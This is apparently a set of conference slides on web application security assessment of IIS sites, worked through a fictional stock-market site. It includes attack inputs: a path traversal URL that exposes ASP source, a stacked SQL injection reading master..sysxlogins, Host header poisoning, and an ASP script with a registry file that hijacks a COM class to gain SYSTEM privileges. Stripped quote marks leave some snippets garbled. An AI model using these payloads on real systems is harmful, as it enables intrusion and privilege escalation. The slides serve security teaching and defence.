Application Assessments on IIS

Welcome!
David Litchfield
(d.litchfield@atstake.com)

What is an Application Assessment?

Part of a network vulnerability assessment

Application provides the site functionality

Application is least tested but often proves to be the

greatest risk

Vulnerability Scanners
Cybercop
I. S. S.
Cerberus Internet Scanner

What scanners do do
They highlight known vulnerabilities in COTS products

Webhits.dll and null.htw

MSADC and RDS
Ism.dll and .htr overflow
%C0%AF UNICODE issue

What scanners dont do

They wont assess your application

Assessing the Application

What services does the site offer?

What functionality exists to provide these services?
What drives this functionality?
How does it do this?

Stocks-r-us.com

Free charting service of current/real-time market trends

A subscriber service providing detailed market analysis
An Ive forgot my password service
A contact service
Apply for a job with stocks-r-us.com online service

Free charting service of current/real-time market trends

From a web form a user chooses the stock market
They also choose a time range
On Submitting a page called read_img.asp returns a graph
of the ups and downs of the market:

http://www.stocks-r-us.com/read_img.asp?IDN=00000008&IFN=AXYZPQ&IFE=png

http://www.stocks-r-us.com/read_img.asp?IDN=&IFN=&IFE=

Exception Handling

ASP Error 800814:

Create object failed in /includes/olectra.inc
Downloading the .inc file reveals nothing but there are
two issues here: bad exception handling and .inc has
not been mapped to asp.dll
A search on google reveals Olectra Chart

Source code revelation!

Olectra creates a virtual directory called /octemp

When a graph or chart is produced a temp directory is

created in the /octemp directory. This directorys
name is a number like 00000008
The dynamically produced graph is a random string
of letters such as AXYZPQ and has a file
extension of .png
/read_img.asp?IDN=../&IFN=read_img&IFE=asp

SQL Queries
strSQL = select price from stocks where name =
_ & request.querystring(company) &

This code is insecure!!!

Why?

By setting the company parameter to something such as:

ISSX select * from master..sysxlogins
Would execute the two queries in batch mode:
Select price from stocks where name= ISSX
Select * from master..sysxlogins
sa login on MS SQL Server
xp_cmdshell extended stored procedure

On its own, ASP will not escape a single (quote mark)

.idc files will.

Change all s provided in a parameter to 0x27 or strip them out

Consideration for integer input

strSQL = Select company from stocks where

price > & request.querystring(price)

Again we can insert an arbitrary SQL query here and have it

execute.

Verifying numeric input

IsNumeric() for VBScript

NaN() fro JScript

r.f.p Rain Forest Puppy

http://www.wiretrip.net/rfp

Contact Service
<%
..
SMTPObj = GetObject(
IIS:// & request.servervariables(SERVER_NAME) & /SMTPSVC)
..
%>

HTTP SERVER_NAME Poisoning

Host: HTTP Client Header field

Learn the password hash for the IWAM account

Enumerate SQL servers
Proxy attacks
Samples on IIS
ADSI, Corba and COM

On-line job application service

As part of this service stocks-r-us.com allow uploading of
Curriculum Vitaes / Resumes

Client Side checking doesnt work

Scripting enabled on the /cvtemp virtual directory

Gaining SYSTEM Privileges using ASP

IIS Security Model
IUSR and IWAM accounts

Wscript.Shell Object

WSObj = CreateObject(wscript.shell)
Read from the Registry
Write to the Regsitry
Execute commands

MSI.ASP
<%
Dim WshShell, strCMD, result
strCMD = "cmd.exe /c c:\inetpub\wwwroot\msi.reg"
strCMD2 = "cmd.exe /c c:\inetpub\wwwroot\msi.msi"
Set WshShell = Server.CreateObject("Wscript.Shell")
On Error Resume Next
result = WshShell.Run(strCMD)
result = WshShell.Run(strCMD2)
%>

MSI.REG

REGEDIT4

[HKEY_CLASSES_ROOT\CLSID\{000C103E-0000-0000-C000000000000046}\InProcServer32]
@="c:\\inetpub\\wwwroot\\foo.dll"
"ThreadingModel"="Both"

Summary
Understand the technology youre dealing with
Never trust user input anywhere
Ensure permissions are set properly
Dont trust third-party software until truly evaluated
Dont rely on client side checking
Scanners wont find these problems you will

Questions?

Thanks and enjoy the rest the day!